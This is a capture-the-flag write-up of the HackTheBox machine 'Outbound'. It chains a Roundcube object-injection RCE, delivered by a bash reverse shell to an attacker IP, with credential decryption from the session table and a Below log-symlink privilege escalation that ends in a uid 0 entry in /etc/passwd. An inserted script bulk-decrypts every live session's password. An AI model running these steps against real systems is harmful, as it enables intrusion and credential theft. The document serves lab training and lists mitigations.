HTB Outbound - Complete Writeup

HackTheBox Season 9 - This article is part of a series.

Machine Information

  • Name: Outbound
  • Difficulty: Medium
  • OS: Linux (Ubuntu 24.04.2 LTS)
  • IP: 10.129.116.41
  • Points: 30

Executive Summary

Outbound is a medium-difficulty Linux machine built around a Roundcube Webmail 1.6.10 instance vulnerable to CVE-2025-49113 and a privilege escalation through the Below resource-monitoring tool. The chain is: authenticated PHP object injection in Roundcube for a shell inside the webmail container; Roundcube's config and database to decrypt a second user's mailbox password; a cleartext password found in that mailbox for SSH to the host; and finally a symlink planted in Below's world-writable log directory, so that Below, run as root via sudo, makes /etc/passwd writable for the attacker.


Reconnaissance

Port Scanning

A full TCP port scan found two open ports:

nmap -p- --min-rate 10000 10.129.116.41 -oN nmap/all-ports.txt

Results:

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Service Enumeration

Detailed service scan of the two open ports:

nmap -p 22,80 -sCV 10.129.116.41 -oN nmap/services.txt

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/

Key Findings:

  • HTTP on port 80 redirects to mail.outbound.htb, so that name has to resolve locally before the web application can be reached
  • Nginx 1.24.0 in front of the application
  • OpenSSH 9.6p1 (the current Ubuntu 24.04 package; not a promising target on its own)

DNS Configuration

The target is not in DNS, so both names were added to the local hosts file:

echo "10.129.116.41 outbound.htb mail.outbound.htb" | sudo tee -a /etc/hosts

Virtual Host Enumeration

Further name-based virtual hosts were searched for with ffuf; -fw 1 filters out the one-word response nginx returns for unknown Host headers:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -u http://outbound.htb/ -H "Host: FUZZ.outbound.htb" -fw 1

Only the host already seen in the redirect came back:

  • mail.outbound.htb (Status: 200) - Roundcube Webmail

Web Application Analysis

Roundcube Webmail Discovery

Accessing http://mail.outbound.htb revealed a Roundcube webmail login page.

Technology Stack (via Wappalyzer):

  • Webmail: Roundcube 1.6.10
  • Programming Language: PHP
  • JavaScript Libraries: jQuery 3.5.1, jQuery UI 1.13.2
  • UI Framework: Bootstrap 4.5.3

Roundcube Version Identification

The About dialog confirms the exact version:

Roundcube Webmail 1.6.10
Copyright © 2005-2025, The Roundcube Dev Team

Installed Plugins:

  • archive (3.5)
  • filesystem_attachments (1.0)
  • jqueryui (1.13.2)
  • zipdownload (3.4)

Credential Discovery

Outbound is played as an assumed-breach scenario: the machine description supplies one low-privileged mailbox account, so no password guessing was needed:

  • Username: tyler
  • Password: LhKL1o9Nm3X2

Initial Access - CVE-2025-49113

Vulnerability Research

Research revealed CVE-2025-49113, a critical post-authentication Remote Code Execution vulnerability in Roundcube Webmail that affects the installed 1.6.10.

Vulnerability Details:

  • CVE ID: CVE-2025-49113
  • CVSS Score: 9.9 (Critical)
  • Type: PHP object injection (insecure deserialization of session data)
  • Requirements: Any valid mailbox login; tyler's credentials are enough
  • Affected Versions: Roundcube before 1.5.10 and 1.6.x before 1.6.11; 1.6.10 on this host is the last unpatched 1.6 release

Exploitation Process

1. Clone the Exploit

git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
cd CVE-2025-49113-exploit

2. Understand the Exploit

The bug is in the attachment upload action (program/actions/settings/upload.php): the _from request parameter is stored in the PHP session without validation. Roundcube serialises session data in its own format, and a crafted value breaks out of that format so that an attacker-supplied serialized PHP object is parsed as a session variable. When the session is read back, the object is instantiated and its destructor runs. The exploit uses the Crypt_GPG_Engine class bundled with Roundcube as the gadget:

class Crypt_GPG_Engine
{
    // Only the properties the destructor touches are declared; the rest of the
    // real class does not matter once the object has been unserialized.
    public $_process = false;   // no live gpg subprocess to clean up
    public $_gpgconf = '';      // executed as a shell command by __destruct()
    public $_homedir = '';

    public function __construct($_gpgconf)
    {
        // Base64 keeps quotes and slashes intact inside the session encoding;
        // the trailing ';#' comments out the arguments the library appends
        // when it runs $_gpgconf.
        $_gpgconf = base64_encode($_gpgconf);
        $this->_gpgconf = "echo \"{$_gpgconf}\"|base64 -d|sh;#";
    }
}

The exploit:

  1. Logs in with the supplied credentials and builds a serialized Crypt_GPG_Engine object whose _gpgconf property carries the command
  2. Sends it in the _from parameter of an attachment upload request, which writes it into the server-side session
  3. Triggers a request that loads the session; unserialization creates the object and its destructor executes _gpgconf through a shell

3. Set Up Listener

nc -nlvp 4444

4. Execute the Exploit

php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 \
  "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/4444 0>&1'"

Output:

[+] Starting exploit (CVE-2025-49113)...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10610
[+] Target is vulnerable!
[+] Login successful!
[*] Exploiting...
[+] Gadget uploaded successfully!

(10610 is the numeric form of 1.6.10, which the exploit reads from the login page.)

5. Shell Received

connect to [10.10.14.175] from (UNKNOWN) [10.129.116.41] 38784
www-data@mail:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell Stabilization

script /dev/null -c bash
# Press Ctrl+Z to background the shell, then on the attacker terminal:
stty raw -echo; fg
export TERM=xterm

Post-Exploitation Enumeration

Environment Discovery

www-data@mail:/$ ip addr

Results:

2: eth0@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0

Key Observation: 172.17.0.0/16 is Docker's default bridge network and the veth-style interface name (eth0@if4) points the same way, so this shell is inside a container rather than on the host.

Checking for Docker Environment

www-data@mail:/$ ls -la / | grep docker
-rwxr-xr-x   1 root root    0 Jun  8 12:26 .dockerenv

The /.dockerenv marker confirms it.

User Enumeration

www-data@mail:/$ ls -l /home
total 12
drwx------ 2 jacob jacob 4096 Jun  8 12:05 jacob
drwx------ 2 mel   mel   4096 Jun  8 12:05 mel
drwx------ 2 tyler tyler 4096 Jun  8 12:05 tyler

All three home directories are mode 700 and inaccessible to www-data, but the user names themselves are useful: they match the mailboxes in the Roundcube database.

Roundcube Configuration Analysis

Roundcube's config.inc.php has to be readable by the PHP worker, which is the user we already are:

www-data@mail:/$ cd /var/www/html/roundcube/config
www-data@mail:/var/www/html/roundcube/config$ cat config.inc.php

Critical Findings:

// Database credentials
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

// Encryption key
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

The DSN gives direct database access. des_key is the 24-byte 3DES key Roundcube uses to encrypt the IMAP password it keeps in each user's session, and this value is the placeholder shipped in Roundcube's default configuration rather than a site-specific secret.

Database Exploitation

MySQL Access

mysql -u roundcube -pRCDBPass2025 roundcube

Database Enumeration

MariaDB [roundcube]> show tables;

Tables of Interest:

  • users - User account information
  • session - Active session data (the serialized session includes each user's encrypted IMAP password)

Extracting User Data

MariaDB [roundcube]> select * from users;

Results:

+---------+----------+-----------+---------------------+
| user_id | username | mail_host | created             |
+---------+----------+-----------+---------------------+
|       1 | jacob    | localhost | 2025-06-07 13:55:18 |
|       2 | mel      | localhost | 2025-06-08 12:04:51 |
|       3 | tyler    | localhost | 2025-06-08 13:28:55 |
+---------+----------+-----------+---------------------+

Extracting Session Data

MariaDB [roundcube]> select * from session \G

(\G already terminates the statement; a ";" after it only produces a "No query specified" error.)

Jacob's Session Data (Base64 encoded):

sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
password: L7Rv00A8TuwJAr67kITxxcSgnIk25Am/

Tyler's Session Data (Base64 encoded):

sess_id: usftbeqoftit6rgficqc6d3r3s
password: JgsQSNHDYW+iO9steYNQRBgHh0D+Kgmw

Decoding Session Data

The vars column is Base64; decoding it (CyberChef's "From Base64" is enough) yields Roundcube's serialized PHP session, in which the password entry is the user's IMAP password encrypted with des_key and Base64-encoded again. The two strings above are those inner values.

Password Decryption

Roundcube ships a helper, bin/decrypt.sh, that calls rcube::decrypt() with the configured des_key. Running it from the web root as www-data:

www-data@mail:/var/www/html/roundcube$ ./bin/decrypt.sh L7Rv00A8TuwJAr67kITxxcSgnIk25Am/
595mO8DmwGeD

www-data@mail:/var/www/html/roundcube$ ./bin/decrypt.sh JgsQSNHDYW+iO9steYNQRBgHh0D+Kgmw
LhKL1o9Nm3X2

Decrypted Credentials:

  • jacob: 595mO8DmwGeD
  • tyler: LhKL1o9Nm3X2 (the password we started with, which validates the decryption)
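
The same decryption done offline with openssl, added here as an example (it is not from the writeup and not Roundcube's own tooling), for the case where bin/decrypt.sh is unavailable or the session dump has already been exfiltrated. It assumes Roundcube's documented defaults for rcube::encrypt (cipher DES-EDE3-CBC, an 8-byte random IV prepended to the ciphertext, PKCS#7 padding) and the des_key from config.inc.php; the rc_dump_passwords wrapper and the sample session string in the usage are my own constructions.

```shell
#!/bin/sh
# Added example (not from the writeup and not Roundcube's own code): decrypt a Roundcube
# session password offline with openssl, e.g. from an exfiltrated session dump.
# Assumed format (Roundcube's documented defaults): the session "vars" column is base64 of
# PHP-session-serialised data; its "password" value is base64( IV(8 bytes) || ciphertext )
# where ciphertext = DES-EDE3-CBC(password, des_key) with PKCS#7 padding.
# Needs openssl plus base64/od/head/tail from GNU coreutils.

DES_KEY='rcmail-!24ByteDESkey*Str'   # $config['des_key'] read from config.inc.php on the box

# hex-encode stdin without separators
to_hex() { od -An -tx1 -v | tr -d ' \n'; }

# rc_session_field <base64 vars column> <field>: pull one string field out of the
# serialised session (works for "username" and "password")
rc_session_field() {
    printf '%s' "$1" | base64 -d | tr -d '\000' \
        | sed -n "s/.*$2|s:[0-9]*:\"\([^\"]*\)\".*/\1/p"
}

# rc_decrypt <base64 encrypted password> [des_key]: print the cleartext password
rc_decrypt() {
    blob=$(mktemp)
    printf '%s' "$1" | base64 -d > "$blob"
    iv_hex=$(head -c 8 "$blob" | to_hex)              # the first 8 bytes are the random IV
    key_hex=$(printf '%s' "${2:-$DES_KEY}" | to_hex)  # 24-byte key -> 48 hex digits
    tail -c +9 "$blob" | openssl enc -d -des-ede3-cbc -K "$key_hex" -iv "$iv_hex"
    rc=$?
    rm -f "$blob"
    return $rc
}

# rc_dump_passwords: run inside the webmail container; prints "sess_id username password"
# for every live session. Assumes the mysql client and the DSN from config.inc.php.
rc_dump_passwords() {
    mysql -N -u roundcube -pRCDBPass2025 roundcube -e 'SELECT sess_id, vars FROM session' |
    while read -r sid vars; do
        enc=$(rc_session_field "$vars" password)
        [ -n "$enc" ] || continue                     # session without a login yet
        printf '%s %s %s\n' "$sid" "$(rc_session_field "$vars" username)" "$(rc_decrypt "$enc")"
    done
}
```

After sourcing the file, rc_decrypt 'L7Rv00A8TuwJAr67kITxxcSgnIk25Am/' prints jacob's password exactly as decrypt.sh did, and rc_session_field accepts the raw vars value straight out of the session table (a constructed row such as the Base64 of language|s:5:"en_US";username|s:5:"jacob";password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"; returns the inner password string). Because the IV is random, two sessions for the same user hold different ciphertexts for the same password, which is why the decryption has to be done per row rather than by matching known values.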

Lateral Movement - Jacob

Email Analysis

Logging into Roundcube as jacob@outbound.htb with the decrypted password revealed two important emails:

Email 1: From Tyler

Subject: Important Update
Date: 2025-06-07 17:00

Due to the recent change of policies your password has been changed.

Please use the following credentials to log into your account: gY4Wr3a1evp4

Remember to change your password when you next log into your account.

Thanks!
Tyler

Email 2: From Mel

Subject: Unexpected Resource Consumption
Date: 2025-06-08 15:09

We have been experiencing high resource consumption on our main server.
For now we have enabled resource monitoring with Below and have granted
you privileges to inspect the logs.

Please inform us immediately if you notice any irregularities.

Thanks!
Mel

Key Intel:

  • New password for jacob: gY4Wr3a1evp4, sent in cleartext over email
  • The Below monitoring tool is in use on the "main server", i.e. the host rather than the webmail container
  • Jacob has been granted some privilege related to Below's logs

SSH Access

ssh jacob@outbound.htb
Password: gY4Wr3a1evp4

Success! Note the hostname: this is the host (outbound), not the mail container:

jacob@outbound:~$ id
uid=1002(jacob) gid=1002(jacob) groups=1002(jacob),100(users)

User Flag

jacob@outbound:~$ cat user.txt
5bb1d003e93ea72a0cd955ea30f024e4

Privilege Escalation

Sudo Privileges

jacob@outbound:~$ sudo -l

Output:

User jacob may run the following commands on outbound:
    (ALL : ALL) NOPASSWD: /usr/bin/below *, 
    !/usr/bin/below --config*, 
    !/usr/bin/below --debug*, 
    !/usr/bin/below -d*

Analysis:

  • jacob can run /usr/bin/below with any arguments as root, without a password
  • The negated entries only block the --config, --debug and -d switches, i.e. pointing below at an attacker-controlled config file or enabling debug output
  • Everything else the tool does, including whatever it does at startup before a subcommand runs, happens as root on jacob's command

Below Tool Analysis

jacob@outbound:~$ /usr/bin/below --help

Output:

Usage: below [OPTIONS] [COMMAND]

Commands:
  live      Display live system data (interactive) (default)
  record    Record local system data (daemon mode)
  replay    Replay historical data (interactive)
  debug     Debugging facilities (for development use)
  dump      Dump historical data into parseable text format
  snapshot  Create a historical snapshot file for a given time range
  help      Print this message or the help of the given subcommand(s)

Options:
      --config <CONFIG>  [default: /etc/below/below.conf]
  -d, --debug            
  -h, --help             Print help

The sudo rule blocks exactly the two options listed here, so every subcommand, and whatever below does before dispatching to it, remains available as root.

Investigating Below's Log Files

jacob@outbound:~$ ls -la /var/log/below/

Output:

total 8
-rw-rw-rw- 1 jacob jacob  236 Jul  8 20:45 error_jacob.log
-rw-rw-rw- 1 root  root     0 Jul 14 16:39 error_root.log
drwxr-xr-x 2 root  root  4096 Nov 18 16:43 store

Key Observations:

  1. below keeps one error log per invoking user, error_<user>.log, and both are mode 0666 (read/write for owner, group and everyone else), which is not what the usual umask produces: below sets that mode itself when it opens the log
  2. error_root.log is owned by root yet world-writable, so anything a root-run below writes there can be read and tampered with by any local user
  3. Replacing a file with a symlink needs write permission on the directory rather than on the file; the rm and ln in the next section succeed as jacob, so /var/log/below itself is writable by unprivileged users too (the listing above omits the "." entry that would have shown its mode)

Exploitation Strategy

Below's logging is the privilege escalation vector:

  1. /var/log/below is writable by jacob, so the root-owned error_root.log can be deleted and replaced with a symlink
  2. Each time below starts as root it opens error_root.log by path and applies mode 0666 to it (the identical mode on both logs is the tell), and both operations follow symlinks
  3. Pointing error_root.log at /etc/passwd therefore makes below chmod /etc/passwd to 0666 on the next sudo run
  4. Once /etc/passwd is world-writable, jacob appends a uid 0 account with an empty password field and switches to it with su

Privilege Escalation Execution

Step 1: Remove Existing Log File

jacob@outbound:/var/log$ rm -f /var/log/below/error_root.log

Step 2: Create Symlink to /etc/passwd

jacob@outbound:/var/log$ ln -s /etc/passwd /var/log/below/error_root.log

Step 3: Verify Symlink

jacob@outbound:/var/log$ ls -la /var/log/below/error_root.log
lrwxrwxrwx 1 jacob jacob 11 Nov 18 18:37 /var/log/below/error_root.log -> /etc/passwd

Step 4: Trigger Below as Root and Append the Entry

jacob@outbound:/var/log$ sudo /usr/bin/below record

Output:

Nov 18 18:37:57.015 DEBG Starting up!
Nov 18 18:37:57.015 ERRO 
----------------- Detected unclean exit ---------------------
Error Message: Failed to acquire file lock on index file: /var/log/below/store/index_01763424000: EAGAIN: Try again
-------------------------------------------------------------

The command fails because a below recorder is already running and holds the lock on the data store. That does not matter: logging is initialised at startup, before the lock is attempted (the DEBG "Starting up!" line was already logged when the lock failed), so by the time the error appears below has opened error_root.log as root, followed the symlink, and set /etc/passwd to mode 0666. Any error text below writes to its log would land in /etc/passwd as well, so keep the file intact and verify it afterwards.

Before the run /etc/passwd had its normal mode:

jacob@outbound:/var/log$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1840 Jul 14 16:40 /etc/passwd

Check it again after the sudo command: if it now shows -rw-rw-rw-, the chain has worked and jacob can write to it directly. Append (do not overwrite) a uid 0 user; a single ">" in place of ">>" would truncate /etc/passwd and lock everyone out:

jacob@outbound:/var/log$ echo '7r00t::0:0:7r00t:/root:/bin/bash' >> /var/log/below/error_root.log

Writing through the symlink and writing to /etc/passwd directly are the same operation at this point; the symlink is only still in place because nothing has removed it. The empty second field means "no password"; if PAM on a target refuses that, put a hash produced by openssl passwd -6 in the field instead.

Step 5: Switch to Root User

jacob@outbound:/var/log$ su - 7r00t

Step 6: Verify Root Access

7r00t@outbound:~# id
uid=0(7r00t) gid=0(root) groups=0(root)

Success! We have root access!

Root Flag

7r00t@outbound:~# cat /root/root.txt
8fa05b1c8a7ae2ea2912fee51bf34382

Flags Summary

  • User Flag: 5bb1d003e93ea72a0cd955ea30f024e4
  • Root Flag: 8fa05b1c8a7ae2ea2912fee51bf34382

Key Vulnerabilities Exploited

1. CVE-2025-49113 - Roundcube RCE

Vulnerability Type: PHP object injection / insecure deserialization
Impact: Remote Code Execution as www-data
CVSS: 9.9 (Critical)

Root Cause: The attachment upload action stored the unvalidated _from request parameter in the PHP session. A crafted value broke out of Roundcube's session serialisation format, so an attacker-supplied serialized object (here Crypt_GPG_Engine, whose destructor executes a configurable command) was unserialized on a later request.

Mitigation:

  • Update Roundcube to 1.6.11 / 1.5.10 or later
  • Do not expose webmail to the internet without MFA or a VPN in front of it; the bug is post-auth, so every phished mailbox password becomes code execution
  • Run the webmail container with a read-only filesystem and no outbound egress where possible, which would have blocked this reverse shell
  • Review the session table and web logs for unexpected serialized objects arriving in upload requests

2. Recoverable Passwords in the Session Store

Vulnerability Type: Weak key management for reversibly encrypted credentials
Impact: Credential disclosure for every user with a live session

Root Cause: Roundcube keeps each user's IMAP password in the session in recoverable form because it re-authenticates to IMAP on every request, so hashing is not an option here. The weaknesses are that des_key was left at the value shipped in Roundcube's default configuration, that the key sits next to the database credentials in a file the compromised web user can read, and that bin/decrypt.sh turns recovery into a one-liner.

Mitigation:

  • Set a unique, random 24-byte des_key per installation; never keep the sample value
  • Keep session lifetimes short and purge stale rows from the session table, so fewer passwords are recoverable at any moment
  • Use a dedicated, least-privilege database account, and keep the database off the webmail host where practical
  • Treat a compromise of the webmail host as a compromise of every mailbox password: rotate them, and never reuse mailbox passwords for SSH or other services

3. Below Log File Symlink Following

Vulnerability Type: Symlink following during privileged file creation (world-writable log directory)
Impact: Arbitrary file chmod and write as root, leading to full privilege escalation

Root Cause: Below keeps its per-user error logs in a directory unprivileged users can write to, and when started as root it opens error_root.log by path and forces its mode to 0666 without checking for a symlink. An attacker who replaces the log with a symlink to /etc/passwd gets that file made world-writable by root; no race is needed afterwards, the attacker simply appends a uid 0 entry. The NOPASSWD sudo rule turned a local bug into a one-command root.

Mitigation:

  • Update below to a release that no longer creates a world-writable log directory or follows symlinks when opening its log
  • Make /var/log/below root-owned and 0755, with log files owned by root and not writable by others
  • In the tool: open log files with O_NOFOLLOW (and O_CREAT|O_EXCL where they are created) and chmod the open descriptor with fchmod, not the path
  • Do not grant NOPASSWD root for a monitoring tool; a sudo rule with negated arguments is not a sandbox, since everything else the binary does still runs as root
  • Run the recorder as a dedicated service user with only the capabilities it needs, and let viewers read its data through group permissions

Attack Chain Summary

1. Reconnaissance
   └─> Discover mail.outbound.htb (Roundcube 1.6.10)

2. Initial Access
   └─> Exploit CVE-2025-49113 (Roundcube RCE) with the supplied tyler credentials
       └─> Gain www-data shell in Docker container

3. Credential Harvesting
   └─> Read database credentials and des_key from config.inc.php
       └─> Decrypt stored passwords from the session table
           └─> Obtain jacob's mailbox password

4. Lateral Movement
   └─> Read jacob's emails for the password update
       └─> SSH as jacob to the host system

5. Privilege Escalation
   └─> Replace Below's error_root.log with a symlink to /etc/passwd
       └─> Run sudo below record so root chmods /etc/passwd to 0666
           └─> Append a uid 0 user entry
               └─> su to it for a root shell

6. Post-Exploitation
   └─> Capture user and root flags

Tools Used

  • Nmap - Port scanning and service enumeration
  • ffuf - Virtual host discovery
  • CVE-2025-49113 exploit (hakaioffsec) - Roundcube RCE exploitation
  • Netcat - Reverse shell listener
  • MySQL client - Database access and enumeration
  • CyberChef - Base64 decoding of session data
  • Roundcube bin/decrypt.sh - Session password decryption
  • SSH - Remote access


I hope this was helpful.

Author: Adonijah Kiplimo
Cybersecurity professional specializing in Network & Cloud Security, Digital Forensics, and Penetration Testing. Passionate about sharing knowledge and empowering others through hands-on security training.